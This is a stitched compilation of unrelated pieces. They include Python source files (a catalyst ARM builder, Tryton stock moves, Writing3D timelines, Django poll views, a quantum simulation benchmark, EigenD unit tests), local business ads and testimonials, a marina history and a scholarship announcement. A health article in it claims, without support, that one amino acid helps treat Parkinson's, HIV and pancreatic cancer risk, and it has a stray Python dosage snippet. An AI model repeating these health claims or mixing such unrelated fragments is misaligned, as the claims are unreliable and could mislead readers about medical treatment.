    "Builder class for armv6j target"
    def __init__(self,myspec):
        generic_arm.__init__(self,myspec)
        self.settings["CHOST"]="armv6j-softfp-linux-gnueabi"
        self.settings["CFLAGS"]+=" -march=armv6j -mfpu=vfp -mfloat-abi=softfp"

class arch_armv6z(generic_arm):
    "Builder class for armv6z target"
    def __init__(self,myspec):
        generic_arm.__init__(self,myspec)
        self.settings["CHOST"]="armv6z-softfp-linux-gnueabi"
        self.settings["CFLAGS"]+=" -march=armv6z -mfpu=vfp -mfloat-abi=softfp"

class arch_armv6zk(generic_arm):
    "Builder class for armv6zk target"
    def __init__(self,myspec):
        generic_arm.__init__(self,myspec)
        self.settings["CHOST"]="armv6zk-softfp-linux-gnueabi"
        self.settings["CFLAGS"]+=" -march=armv6zk -mfpu=vfp -mfloat-abi=softfp"

class arch_armv7a(generic_arm):
    "Builder class for armv7a target"
    def __init__(self,myspec):
        generic_arm.__init__(self,myspec)
        self.settings["CHOST"]="armv7a-softfp-linux-gnueabi"
        self.settings["CFLAGS"]+=" -march=armv7-a -mfpu=vfpv3-d16 -mfloat-abi=softfp"

class arch_armv6j_hardfp(generic_arm):
    "Builder class for armv6j hardfloat target, needs >=gcc-4.5"
    def __init__(self,myspec):
        generic_arm.__init__(self,myspec)
        self.settings["CHOST"]="armv6j-hardfloat-linux-gnueabi"
        self.settings["CFLAGS"]+=" -march=armv6j -mfpu=vfp -mfloat-abi=hard"

class arch_armv7a_hardfp(generic_arm):
    "Builder class for armv7a hardfloat target, needs >=gcc-4.5"
    def __init__(self,myspec):
        generic_arm.__init__(self,myspec)
        self.settings["CHOST"]="armv7a-hardfloat-linux-gnueabi"
        self.settings["CFLAGS"]+=" -march=armv7-a -mfpu=vfpv3-d16 -mfloat-abi=hard"

class arch_armv5teb(generic_armeb):
    "Builder class for armv5teb (XScale) target"
    def __init__(self,myspec):
        generic_armeb.__init__(self,myspec)
        self.settings["CFLAGS"]+=" -mcpu=xscale"
        self.settings["CHOST"]="armv5teb-softfloat-linux-gnueabi"

def register():
    "Inform main catalyst program of the contents of this plugin."
    return ({
        "arm"       : arch_arm,
        "armv4l"    : arch_armv4l,
        "armv4tl"   : arch_armv4tl,
        "armv5tl"   : arch_armv5tl,
        "armv5tel"  : arch_armv5tel,
        "armv5tejl" : arch_armv5tejl,
        "armv6j"    : arch_armv6j,
        "armv6z"    : arch_armv6z,
        "armv6zk"   : arch_armv6zk,
        "armv7a"    : arch_armv7a,
        "armv6j_hardfp" : arch_armv6j_hardfp,
        "armv7a_hardfp" : arch_armv7a_hardfp,
        "armeb"     : arch_armeb,
        "armv5teb"  : arch_armv5teb
    }, ("arm", "armv4l", "armv4tl", "armv5tl", "armv5tel", "armv5tejl", "armv6l",
        "armv7l", "armeb", "armv5teb") )
|
At Air Cooler Guys, we will be available to meet all of your goals when it comes to Air Coolers in Thiensville, WI. Our company has a staff of experienced contractors and the most advanced technology around to supply everything that you need. We make certain that you receive the most effective support, the right price tag, and the highest quality materials. Call us at 888-270-6611 and we'll be glad to talk about the choices, address the questions you have, and set up a consultation to start scheduling your task.
You have a price range to comply with, and you need to cut costs. On the other hand, you want the very best and highest quality of services regarding Air Coolers in Thiensville, WI. We offer the best quality while still costing you less. Our aspiration is to make sure that you enjoy the finest materials and a finished project which will last through the years. We will accomplish this by providing you with the best deals in the field and eliminating expensive complications. Save your time and funds by simply getting in touch with Air Cooler Guys now. We are waiting to answer your phone call at 888-270-6611.
To make the ideal decisions concerning Air Coolers in Thiensville, WI, you should be knowledgeable. We will never let you make unwise decisions, since we know what we'll be working at, and we make sure you know what to expect from the work. We will take the unexpected surprises out from the scenario by supplying precise and complete advice. Step one will be to call us today by dialing 888-270-6611 to set up your project. We will reply to your important questions and set up your initial appointment. Our team can arrive at the appointed time with the appropriate equipment, and will work with you through the entire job.
You've got many good reasons to consider Air Cooler Guys to suit your needs involving Air Coolers in Thiensville, WI. We have got the best customer care scores, the very best quality resources, and the most useful and productive money saving techniques. We have got the experience you will want to satisfy all of your objectives. Contact 888-270-6611 when you need Air Coolers in Thiensville, and we're going to work together with you to systematically complete your task.
|
# -*- coding: utf-8 -*-
"""
stock_lot_serial.stock
Shipment
:copyright: (c) 2013-2014 by Openlabs Technologies & Consulting (P) Limited
:license: 3-clause BSD, see LICENSE for more details.
"""
from trytond.model import ModelView
from trytond.pool import PoolMeta, Pool
from trytond.pyson import Eval
__metaclass__ = PoolMeta
__all__ = ['ShipmentIn', 'Move']
class ShipmentIn:
    "ShipmentIn"
    __name__ = "stock.shipment.in"

    @classmethod
    def __setup__(cls):
        super(ShipmentIn, cls).__setup__()
        cls._buttons.update({
            'split_moves': {
                'invisible': Eval('state') != 'draft',
            },
        })

    def _split_moves(self):
        "Split incoming moves with quantity greater than 1"
        Move = Pool().get('stock.move')
        for move in self.incoming_moves:
            if not move.product.serialized_inventory_control:
                continue
            # Peel off unit-quantity copies until the original move is down to 1
            while move.quantity > 1:
                Move.copy([move], {'quantity': 1, 'lot': None})
                move.quantity -= 1
            move.save()

    @classmethod
    @ModelView.button
    def split_moves(cls, shipments):
        "Split incoming moves with quantity greater than 1"
        for shipment in shipments:
            shipment._split_moves()


class Move:
    "Move"
    __name__ = "stock.move"

    @classmethod
    def __setup__(cls):
        super(Move, cls).__setup__()
        cls._error_messages.update({
            'quantity_one': "Quantity for moves with products having serialized"
                " inventory control cannot be greater than 1."
        })

    def check_product_serial(self):
        """
        Ensure that products with serialized inventory control have only 1 as
        quantity for stock moves.
        """
        if self.state == 'done' and \
                self.product.template.serialized_inventory_control and \
                self.quantity != 1.0:
            self.raise_user_error('quantity_one')

    @classmethod
    def validate(cls, moves):
        """
        Check if quantity is one when serialized inventory control is true for
        each incoming move
        """
        super(Move, cls).validate(moves)
        for move in moves:
            move.check_product_serial()
|
Come join in the fun and watch us grow!
In June of 1958, the Tennessee Valley Authority (TVA) transferred this beautiful 31-acre lakefront site to the Town of Spring City for the enjoyment of the recreating public on Watts Bar Lake in Rhea County, Tennessee. As with many other similar public land transfers by TVA in the 1940’s and 1950’s, these land parcels were to provide lake access and promote recreation and tourism for local communities across the Tennessee Valley Authority’s seven-state region.
Over the years it became obvious that the local governments would need to lease these lakefront properties to commercial operators to facilitate improvements for the recreating public. For nearly 50 years, the Spring City Boat Dock has provided a rich history of lake-oriented recreation. Hundreds of families from across the East Tennessee region have enriched their children’s and grandchildren’s lives through long summer days of boating, fishing, swimming and picnicking on this beautiful, protected cove just 3 miles from downtown Spring City.
In 2005, the Spring City Development, LLC (SCD) partnership was formed to purchase the assets from the existing operators and accept the leasehold interest from the Town of Spring City. The SCD partners and the Town of Spring City have formalized the continued free access and use of the TWRA boat launching area and fishing pier. To continue the rich heritage of public and commercial use at Spring City Dock, SCD is committed to working with our city, county and other partners to make substantial improvements to the docking, dining, lodging and other potential amenities. We will be hosting and sponsoring many upcoming events to enrich the year-round fun that this resort and marina complex can provide for our friends, neighbors and visitors.
Fishing on your mind? For exciting Catfish, Striper and Hybrid Fishing on the beautiful Watts Bar Lake, we recommend AJ's Guide Service! Aaron Jenkins has over seventeen years of Catfish and Striper fishing experience and has learned from the best, such as Gary Roberts and Tom Evans. He lives to fish and devotes countless hours on the water to make sure that he is the best guide and fisherman he can be. When you fish with Captain AJ, he will give 110% to not only make sure you catch fish, but to make your trip one of the most enjoyable fishing experiences of your life.
Hunters! You need to check out Buck Hunters Hunting Club. They have 4-wheeling and outings along with hunting on very large acreage a few miles from our marina.
|
# Copyright (C) 2016 William Hicks
#
# This file is part of Writing3D.
#
# Writing3D is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
"""Tools for working with timelines in W3D projects
"""
import logging
LOGGER = logging.getLogger("pyw3d")
import xml.etree.ElementTree as ET
from .features import W3DFeature
from .actions import W3DAction
from .validators import ListValidator, IsNumeric, IsBoolean, ValidPyString, \
FeatureValidator
from .errors import ConsistencyError, BadW3DXML
from .xml_tools import bool2text, text2bool
from .activators import BlenderTimeline
from .errors import EBKAC
from .structs import SortedList
class W3DTimeline(W3DFeature):
    """Represent timeline for choreography of actions in the W3D

    :param str name: Name of timeline
    :param bool start_immediately: Start timeline when project starts?
    :param list actions: A list of two-element tuples specifying (start time
    for action, W3DAction)
    """

    argument_validators = {
        "name": ValidPyString(),
        "start_immediately": IsBoolean(),
        "actions": ListValidator(
            ListValidator(
                [IsNumeric(min_value=0), FeatureValidator(W3DAction)],
                item_label="Start Time(s), Action",
                required_length=2,
                help_string="Start time in seconds, action to perform"
            ),
            help_string="A list of (float, W3DAction) tuples")
    }

    default_arguments = {
        "start_immediately": True
    }

    def __init__(self, *args, **kwargs):
        super(W3DTimeline, self).__init__(*args, **kwargs)
        if "actions" not in self:
            self["actions"] = SortedList()
        else:
            self["actions"] = SortedList(self["actions"])

    def toXML(self, all_timelines_root):
        """Store W3DTimeline as Timeline node within TimelineRoot node"""
        try:
            timeline_attribs = {"name": self["name"]}
        except KeyError:
            raise ConsistencyError("W3DTimeline must specify a name")
        if "start_immediately" in self:
            timeline_attribs["start-immediately"] = bool2text(
                self["start_immediately"])
        timeline_root = ET.SubElement(
            all_timelines_root, "Timeline", attrib=timeline_attribs)
        for time, action in self["actions"]:
            action_root = ET.SubElement(
                timeline_root, "TimedActions",
                attrib={"seconds-time": str(time)}
            )
            action.toXML(action_root)
        return timeline_root

    @classmethod
    def fromXML(timeline_class, timeline_root):
        """Create W3DTimeline from Timeline node of W3D XML

        :param :py:class:xml.etree.ElementTree.Element timeline_root
        """
        new_timeline = timeline_class()
        try:
            new_timeline["name"] = timeline_root.attrib["name"]
        except KeyError:
            raise BadW3DXML(
                "Timeline node must specify name attribute")
        if "start-immediately" in timeline_root.attrib:
            new_timeline["start_immediately"] = text2bool(timeline_root.attrib[
                "start-immediately"])
        for timed_action in timeline_root.findall("TimedActions"):
            try:
                action_time = float(timed_action.attrib["seconds-time"])
            except (KeyError, ValueError):
                raise BadW3DXML(
                    "TimedActions node must specify numeric seconds-time "
                    "attribute")
            for child in timed_action.getchildren():
                new_timeline["actions"].add(
                    (action_time, W3DAction.fromXML(child)))
        return new_timeline

    def blend(self):
        """Create Blender object to implement W3DTimeline"""
        self.activator = BlenderTimeline(
            self["name"], self["actions"],
            start_immediately=self["start_immediately"])
        LOGGER.debug("Creating timeline {}".format(self["name"]))
        self.activator.create_blender_objects()
        return self.activator.base_object

    def link_blender_logic(self):
        """Link BGE logic bricks for this W3DTimeline"""
        try:
            self.activator.link_logic_bricks()
        except AttributeError:
            raise EBKAC(
                "blend() must be called before link_blender_logic()")

    def write_blender_logic(self):
        """Write any necessary game engine logic for this W3DTimeline"""
        LOGGER.debug(
            "Writing game logic for {}".format(self["name"])
        )
        try:
            self.activator.write_python_logic()
        except AttributeError:
            raise EBKAC(
                "blend() must be called before write_blender_logic()")
|
In February 2016, Launch Manistee announced plans for a Manistee Commitment Scholarship Program. The program was put together due to the generosity of Manistee residents Bill and Marty Paine, who are financially supporting it and through the coordination of Launch Manistee. It is also a joint effort of West Shore Community College, Manistee County Community Foundation (MCCF) and six local school districts: Manistee, Manistee Catholic, Bear Lake, Onekama, CASMAN and Kaleva Norman Dickson (Brethren).
The program promises a college education to select Manistee County ninth graders who show academic promise and have financial need. In addition to receiving a tuition scholarship to West Shore Community College for up to three years and 60 credit hours, selected students and their families will benefit from complimentary programs that provide academic, social, and financial support.
Now heading into our third year, we have three cohorts and a total of 84 students who were nominated by their respective schools.
Save the Date: Our third Manistee Commitment Scholarship Program Induction Ceremony will be held on Wednesday, September 26, 2018 at West Shore Community College at 6:00 p.m. for our third cohort of students.
If you are interested in public events related to the Manistee Commitment Scholarship Program, please join the Launch Manistee Facebook page and watch for photos, updates and event notices.
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from polls.models import Poll

import json
import re


# Create your views here.
def index(request):
    return render(request, 'polls/index.html')


def top_commenters(request):
    """just returns contents of top_commenters.json"""
    with open('polls/top_commenters.json', 'r') as f:
        data = f.read()
    return HttpResponse(data, content_type="application/json")


def poll_results_json(request, poll_thread_id):
    poll = get_object_or_404(Poll, thread_id=poll_thread_id)
    if poll.is_active:
        data = poll.json_results
    else:
        data = json.dumps(poll.status.name)
    return HttpResponse(data, content_type="application/json")


def poongko_sort(x):
    # Sort key that pins 'Poongko' to the front; everything else sorts
    # case-insensitively. Returning tuples keeps the key orderable in Python 3,
    # where ints and strings cannot be compared.
    if x == 'Poongko':
        return (0, '')
    return (1, x.lower())


def poll_detail(request, slug):
    poll = get_object_or_404(Poll, slug=slug)
    choices = poll.choice_set.all()
    # hacky fix to change order for now
    choices = sorted(choices, key=lambda x: poongko_sort(x.name))
    poll_title = re.sub(r'<.*?>', '', poll.name)
    data = {'poll': poll, 'choices': choices, 'poll_title': poll_title}
    return render(request, 'polls/poll_detail.html', data)
|
Get the most from your space with our bathroom design service and trust our experienced tradesmen.
A full range of kitchen appliances are also available from leading brands at very competitive prices.
A Wetroom creates a contemporary look which can transform your bathroom into a stylish, luxurious space.
Bikini Bathrooms offers a cost effective solution to help resolve such problems on behalf of installers or customers, preferably both.
Bikini Bathrooms were brilliant all the way through the journey of deciding what to have in our new shower room. Endless patience, and helpful advice....it made something I had dreaded, into a very positive experience. Special thanks to Gavin and Anne, and to Andy Earney for his great workmanship, fun and tidiness!!! I would recommend your service to anyone. Many thanks!
Had my master bathroom completely redesigned and furnished by Bikini bathrooms. I am over the moon. Anne and her staff were so helpful in helping me pick fixtures and fittings. Andy F the fitter was perfect. He explained how we could redesign our bathroom around to maximise space. Nothing was too much trouble. His workmanship is the best I have seen. Not one fault. Impeccably neat and tidy. I am so impressed that now I am having my ensuite and cloakroom done. Highly recommend to everyone. Thank you Bikini Bathrooms.
15 yr old en-suite refurbished Aug 2017. Everyone I dealt with at Bikini Bathrooms was professional, friendly and helpful. Ann's knowledge of which colours of tiles and furniture complimented each other was really helpful, it all looks fabulous! The fitting by Andy of A & E Installations was first class, all of his recommendations on the best use of the space were spot on. Everyone turned up when they were supposed to and all was left tidy at the end of each day.
Dear Sirs, You installed a new bathroom for us last week. The result is perfect, the materials and installation are first class. A special mention to Andy Fritchley who carried out the fitting ideally. With our best wishes.
We are a family run business who have been involved in designing and installing kitchens and bathrooms for almost 30 years.
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 5 21:44:22 2012
@author: cryan
"""
import numpy as np
from numpy import sin, cos
from scipy.constants import pi
from scipy.linalg import expm, eigh
from PySim.SystemParams import SystemParams
from PySim.PulseSequence import PulseSequence
from PySim.Simulation import simulate_sequence_stack, simulate_sequence
from PySim.QuantumSystems import SCQubit, Hamiltonian, Dissipator
from numba import *
#import matplotlib.pyplot as plt
#from timeit import timeit
#Try to load the CPPBackEnd
# Try to load the CPPBackEnd
try:
    import PySim.CySim
    CPPBackEnd = True
except ImportError:
    CPPBackEnd = False


#@jit(c16[:,:](c16[:,:], c16))
def expm_eigen(matIn, mult):
    '''
    Helper function to compute matrix exponential of Hermitian matrix
    '''
    dim = matIn.shape[0]
    D, V = eigh(matIn)
    return V.dot(np.diag(np.exp(mult*D))).dot(V.conj().T)


@autojit()
def mult_a_X(alpha, X):
    outArray = np.zeros_like(X)
    for rowct in range(X.shape[0]):
        for colct in range(X.shape[1]):
            outArray[rowct,colct] = alpha*X[rowct, colct]
    return outArray


@jit(c16[:,:](c16[:,:], c16[:,:,:], f8[:,:], f8[:]))
#@autojit
def evolution_numba(Hnat, controlHams, controlFields, controlFreqs):
    timeStep = 0.01
    curTime = 0.0
    Uprop = np.eye(Hnat.shape[0])
    for timect in range(controlFields.shape[1]):
        tmpH = np.copy(Hnat)
        for controlct in range(controlFields.shape[0]):
            tmpMult = controlFields[controlct, timect]*cos(2*pi*curTime*controlFreqs[controlct])
            for rowct in range(tmpH.shape[0]):
                for colct in range(tmpH.shape[1]):
                    tmpH[rowct,colct] += tmpMult*controlHams[controlct, rowct, colct]
        # expm_eigen returns the propagator matrix directly
        Uprop = np.dot(expm_eigen(tmpH, -1j*2*pi*timeStep), Uprop)
        curTime += timeStep
    return Uprop


def evolution_numpy(Hnat, controlHams, controlFields, controlFreqs):
    timeStep = 0.01
    curTime = 0.0
    Uprop = np.eye(Hnat.shape[0])
    for timect in range(controlFields.shape[1]):
        tmpH = np.copy(Hnat)
        for controlct in range(controlFields.shape[0]):
            tmpH += controlFields[controlct, timect]*cos(2*pi*curTime*controlFreqs[controlct])*controlHams[controlct]
        Uprop = np.dot(expm_eigen(tmpH, -1j*2*pi*timeStep), Uprop)
        curTime += timeStep
    return Uprop


def sim_setup(dimension, numTimeSteps, numControls):
    # Create a random natural Hamiltonian
    tmpMat = np.random.randn(dimension, dimension) + 1j*np.random.randn(dimension, dimension)
    Hnat = tmpMat + tmpMat.conj().T

    # Create random control Hamiltonians
    controlHams = np.zeros((numControls, dimension, dimension), dtype=np.complex128)
    for ct in range(numControls):
        tmpMat = np.random.randn(dimension, dimension) + 1j*np.random.randn(dimension, dimension)
        controlHams[ct] = tmpMat + tmpMat.conj().T

    # Create random control fields
    controlFields = np.random.randn(numControls, numTimeSteps)

    # Control frequencies
    controlFreqs = np.random.randn(numControls)

    return Hnat, controlHams, controlFields, controlFreqs


def sim_setup_cython(Hnat, controlHams, controlFields, controlFreqs):
    systemParams = SystemParams()
    systemParams.Hnat = Hamiltonian(Hnat)
    pulseSeq = PulseSequence()
    pulseSeq.controlAmps = controlFields
    for ct in range(len(controlHams)):
        systemParams.add_control_ham(inphase=Hamiltonian(controlHams[ct]))
        pulseSeq.add_control_line(freq=controlFreqs[ct], phase=0, controlType='sinusoidal')
    for ct in range(int(np.log2(Hnat.shape[0]))):
        systemParams.add_sub_system(SCQubit(2, 0e9, name='Q1', T1=1e-6))
    pulseSeq.timeSteps = 0.01*np.ones(controlFields.shape[1])
    pulseSeq.maxTimeStep = 1e6
    return systemParams, pulseSeq


if __name__ == '__main__':
    dims = 2**np.arange(1, 6)
    dim = 16
    Hnat, controlHams, controlFields, controlFreqs = sim_setup(dim, 1000, 4)
    print(evolution_numba(Hnat, controlHams, controlFields, controlFreqs))

#    systemParams, pulseSeq = sim_setup_cython(Hnat, controlHams, controlFields, controlFreqs)
#    cythonTimes = []
#    numpyTimes = []
#    for dim in dims:
#        print(dim)
#        Hnat, controlHams, controlFields, controlFreqs = sim_setup(dim, 2000, 4)
#        systemParams, pulseSeq = sim_setup_cython(Hnat, controlHams, controlFields, controlFreqs)
#        numpyTimes.append(timeit('evolution_numpy(Hnat, controlHams, controlFields, controlFreqs)',
#            setup='from __main__ import evolution_numpy, Hnat, controlHams, controlFields, controlFreqs', number=3)/3)
#        cythonTimes.append(timeit('simulate_sequence(pulseSeq, systemParams)', setup='from __main__ import simulate_sequence, pulseSeq, systemParams', number=3)/3)
#
#    plt.plot(dims, numpyTimes)
#    plt.plot(dims, cythonTimes)
#    plt.legend(('Numpy', 'Cython'))
#    plt.xlabel('System Dimension')
#    plt.show()
|
Essential amino acid for hepatic, urinary and cardiovascular protection.
It is an essential amino acid because it can not be produced in the body and thus it can only be obtained exclusively by external intake.
This amino acid is a precursor to the amino acids cysteine and cystine. It was first isolated by John Howard Mueller in 1921.
Hepatic protection: it reduces the accumulation of heavy metals; it lowers cholesterol and triglyceride levels; alongside choline and inositol, this essential amino acid reduces fat accumulation and deposits in the liver thanks to its lipotropic effect; it converts estradiol into the nontoxic form called estriol (protecting the liver during estrogen metabolism).
Improving energy metabolism of the muscle cell that stimulates the production of creatine.
Digestive problems account for nearly 10 percent of all healthcare spending, and at least 70 million Americans suffer from some sort of digestive illness. This amino acid is important in gut health.
From 2013 to 2015, an estimated 54.4 million people in the United States suffered from some form of arthritis. Consuming supplements with this amino acid improves the structure and mobility of joints.
This amino acid provides the body sulfur and other substances necessary for a proper development. Sulfur is a very important element, whose lack leads to the body’s inability to produce certain antioxidants.
It is vital for the transportation and absorption of zinc and selenium in the body. These two essential minerals act just like antioxidants within the body, slowing the aging process and fighting free-radical damage.
Cardiovascular disease accounts for nearly 801,000 deaths every year in the United States. That’s about 1 of every 3 deaths. This amino acid provides cardiovascular protection by reducing fat levels in the bloodstream and atheroma plaque formation.
Higher levels of this amino acid in the daily diet are strongly connected with a lower risk of pancreatic cancer.
Urinary tract protection: it prevents adherence of bacteria to the bladder wall and their proliferation; it reduces the occurrence and formation of kidney stones.
As many as 1 million people in the United States live with Parkinson's disease; that is more than the combined number of patients diagnosed with muscular dystrophy, multiple sclerosis, and Lou Gehrig's disease. According to research, consuming foods high in this amino acid helps in treating and reducing the symptoms of Parkinson's disease.
Maintaining the structure of hair, skin, and nails: it stimulates collagen production.
In 2015, 39,513 individuals were diagnosed with HIV infection in the US. This amino acid may help in HIV/AIDS treatments.
Some individuals with a deficiency in this amino acid may experience the following symptoms – problems with skin integrity, coordination and muscle strength, and detoxification of the liver.
An adult should take in approximately 19 mg of this amino acid per kilogram of body weight every day.
However, special circumstances and conditions may lead to a much higher requirement.
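As a quick illustration of the guideline above, the daily requirement is simply body weight multiplied by 19 mg per kilogram. A small Python sketch (the 70 kg body weight is only an example figure, not a recommendation):

```python
def daily_requirement_mg(weight_kg, mg_per_kg=19):
    """Estimated daily requirement at ~19 mg per kg of body weight."""
    return weight_kg * mg_per_kg

# An example 70 kg adult:
print(daily_requirement_mg(70))  # 1330 mg, i.e. roughly 1.3 g per day
```

Remember that this is only the baseline figure; as noted above, special circumstances can raise the requirement considerably.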
Large amounts of this amino acid can be found in: eggs, sesame, meat, wheat, wheat bran, oats, oat bran, millet, hazelnuts, pecans, peanuts, almonds, pumpkin seeds, chia seeds, sesame seeds, flax seeds, pine seeds, watermelon seeds, sunflower seeds, vegetables, fruits (apples, mangoes, papayas, pineapples) and legumes (peas, red kidney beans, navy beans, adzuki beans, mung beans, lentils, soybeans, chickpeas).
High consumption of this amino acid is not recommended due to its serious side effects. There are not sufficient studies on the use of this type of supplement while pregnant or breastfeeding, so it is best to avoid it in those circumstances. In addition, if you have severe liver disease, do not take supplements containing this amino acid.
Therefore, try not to consume supplements containing this amino acid and to obtain it only from food.
|
#!/usr/bin/env python
#
# Copyright 2009 Eigenlabs Ltd. http://www.eigenlabs.com
#
# This file is part of EigenD.
#
# EigenD is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EigenD is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EigenD. If not, see <http://www.gnu.org/licenses/>.
#
import unittest
from pi import database,logic
class PartofTest(unittest.TestCase):
    def test1(self):
        c = database.RelationCache()
        self.failIf(c.relation(1,2))
        self.failIf(c.direct_relation(1,2))
        c.assert_relation(database.Relation('x',1,2))
        self.failUnless(c.relation(1,2))
        self.failUnless(c.direct_relation(1,2))
        c.assert_relation(database.Relation('x',1,2))
        self.failUnless(c.relation(1,2))
        self.failUnless(c.direct_relation(1,2))
        c.retract_relation(database.Relation('x',1,2))
        self.failUnless(c.relation(1,2))
        self.failUnless(c.direct_relation(1,2))
        c.retract_relation(database.Relation('x',1,2))
        self.failIf(c.relation(1,2))
        self.failIf(c.direct_relation(1,2))

    def test2(self):
        c = database.RelationCache()
        c.assert_relation(database.Relation('x',1,2))
        c.assert_relation(database.Relation('x',3,4))
        self.failUnless(c.relation(1,2))
        self.failUnless(c.relation(3,4))
        self.failUnless(c.direct_relation(1,2))
        self.failUnless(c.direct_relation(3,4))
        self.failIf(c.relation(2,3))
        self.failIf(c.relation(1,3))
        self.failIf(c.relation(1,4))
        self.failIf(c.direct_relation(2,3))
        self.failIf(c.direct_relation(1,3))
        self.failIf(c.direct_relation(1,4))
        self.assertEqual(set((2,)),c.direct_rights(1))
        self.assertEqual(set(),c.direct_rights(2))
        self.assertEqual(set((4,)),c.direct_rights(3))
        self.assertEqual(set(),c.direct_rights(4))
        self.assertEqual(set(),c.direct_lefts(1))
        self.assertEqual(set((1,)),c.direct_lefts(2))
        self.assertEqual(set(),c.direct_lefts(3))
        self.assertEqual(set((3,)),c.direct_lefts(4))
        self.assertEqual(set((2,)),c.rights(1))
        self.assertEqual(set(),c.rights(2))
        self.assertEqual(set((4,)),c.rights(3))
        self.assertEqual(set(),c.rights(4))
        self.assertEqual(set(),c.lefts(1))
        self.assertEqual(set((1,)),c.lefts(2))
        self.assertEqual(set(),c.lefts(3))
        self.assertEqual(set((3,)),c.lefts(4))
        c.assert_relation(database.Relation('x',2,3))
        self.assertEqual(set((2,3,4)),c.rights(1))
        self.assertEqual(set((3,4)),c.rights(2))
        self.assertEqual(set((4,)),c.rights(3))
        self.assertEqual(set(),c.rights(4))
        self.assertEqual(set(),c.lefts(1))
        self.assertEqual(set((1,)),c.lefts(2))
        self.assertEqual(set((1,2)),c.lefts(3))
        self.assertEqual(set((1,2,3)),c.lefts(4))
        self.assertEqual(set((2,)),c.direct_rights(1))
        self.assertEqual(set((3,)),c.direct_rights(2))
        self.assertEqual(set((4,)),c.direct_rights(3))
        self.assertEqual(set(),c.direct_rights(4))
        self.assertEqual(set(),c.direct_lefts(1))
        self.assertEqual(set((1,)),c.direct_lefts(2))
        self.assertEqual(set((2,)),c.direct_lefts(3))
        self.assertEqual(set((3,)),c.direct_lefts(4))
        c.retract_relation(database.Relation('x',2,3))
        self.assertEqual(set((2,)),c.direct_rights(1))
        self.assertEqual(set(),c.direct_rights(2))
        self.assertEqual(set((4,)),c.direct_rights(3))
        self.assertEqual(set(),c.direct_rights(4))
        self.assertEqual(set(),c.direct_lefts(1))
        self.assertEqual(set((1,)),c.direct_lefts(2))
        self.assertEqual(set(),c.direct_lefts(3))
        self.assertEqual(set((3,)),c.direct_lefts(4))
        self.assertEqual(set((2,)),c.rights(1))
        self.assertEqual(set(),c.rights(2))
        self.assertEqual(set((4,)),c.rights(3))
        self.assertEqual(set(),c.rights(4))
        self.assertEqual(set(),c.lefts(1))
        self.assertEqual(set((1,)),c.lefts(2))
        self.assertEqual(set(),c.lefts(3))
        self.assertEqual(set((3,)),c.lefts(4))


class CircleTest(logic.Fixture):
    def __init__(self,*a,**k):
        logic.Fixture.__init__(self,database.Database(),*a,**k)

    def setUp(self):
        r = (database.Relation('partof','wheel','car'),
             database.Relation('partof','hub','wheel'),
             database.Relation('partof','car','hub'))
        self.engine.assert_rules(r)

    def test1(self):
        self.checkVar('@partof(O,car)','O','wheel','hub','car')
        self.checkVar('@partof(O,hub)','O','wheel','hub','car')
        self.checkTrue('@partof(hub,car)')
        self.checkTrue('@partof(car,hub)')
        self.checkTrue('@partof(hub,hub)')
        self.checkTrue('@partof(car,car)')

    def test1d(self):
        self.checkVar('@partof_direct(O,car)','O','wheel')
        self.checkFalse('@partof_direct(hub,car)')
        self.checkTrue('@partof_direct(wheel,car)')

    def test1e(self):
        self.checkVar('@partof_extended(O,car)','O','wheel','hub','car')
        self.checkTrue('@partof_extended(hub,car)')
        self.checkTrue('@partof_extended(car,car)')
        self.checkTrue('@partof_extended(wheel,car)')
        self.checkTrue('@partof_extended(wheel,wheel)')
        self.checkTrue('@partof_extended(car,wheel)')


class RulesTest(logic.Fixture):
    def __init__(self,*a,**k):
        logic.Fixture.__init__(self,database.Database(),*a,**k)

    def setUp(self):
        r = (database.Relation('partof','wheel','car'),
             database.Relation('partof','hub','wheel'),
             database.Relation('partof','tyre','wheel'))
        self.engine.assert_rules(r)

    def test1(self):
        self.checkTrue('@partof(wheel,car)')
        self.checkTrue('@partof(hub,car)')
        self.checkTrue('@partof(tyre,car)')
        self.checkTrue('@partof(hub,wheel)')
        self.checkTrue('@partof(tyre,wheel)')
        self.checkFalse('@partof(car,wheel)')
        self.checkFalse('@partof(car,hub)')
        self.checkFalse('@partof(car,tyre)')
        self.checkFalse('@partof(wheel,hub)')
        self.checkFalse('@partof(wheel,tyre)')
        self.checkFalse('@partof(car,car)')
        self.checkFalse('@partof(wheel,wheel)')

    def test1e(self):
        self.checkTrue('@partof_extended(wheel,car)')
        self.checkTrue('@partof_extended(hub,car)')
        self.checkTrue('@partof_extended(tyre,car)')
        self.checkTrue('@partof_extended(hub,wheel)')
        self.checkTrue('@partof_extended(tyre,wheel)')
        self.checkFalse('@partof_extended(car,wheel)')
        self.checkFalse('@partof_extended(car,hub)')
        self.checkFalse('@partof_extended(car,tyre)')
        self.checkFalse('@partof_extended(wheel,hub)')
        self.checkFalse('@partof_extended(wheel,tyre)')
        self.checkTrue('@partof_extended(car,car)')
        self.checkTrue('@partof_extended(wheel,wheel)')

    def test1d(self):
        self.checkTrue('@partof_direct(wheel,car)')
        self.checkFalse('@partof_direct(hub,car)')
        self.checkFalse('@partof_direct(tyre,car)')
        self.checkTrue('@partof_direct(hub,wheel)')
        self.checkTrue('@partof_direct(tyre,wheel)')
        self.checkFalse('@partof_direct(car,wheel)')
        self.checkFalse('@partof_direct(car,hub)')
        self.checkFalse('@partof_direct(car,tyre)')
        self.checkFalse('@partof_direct(wheel,hub)')
        self.checkFalse('@partof_direct(wheel,tyre)')
        self.checkFalse('@partof_direct(car,car)')
        self.checkFalse('@partof_direct(wheel,wheel)')

    def test2(self):
        self.checkVar('@partof(C,car)','C','wheel','tyre','hub')
        self.checkVar('@partof(C,wheel)','C','tyre','hub')
        self.checkVar('@partof(wheel,C)','C','car')
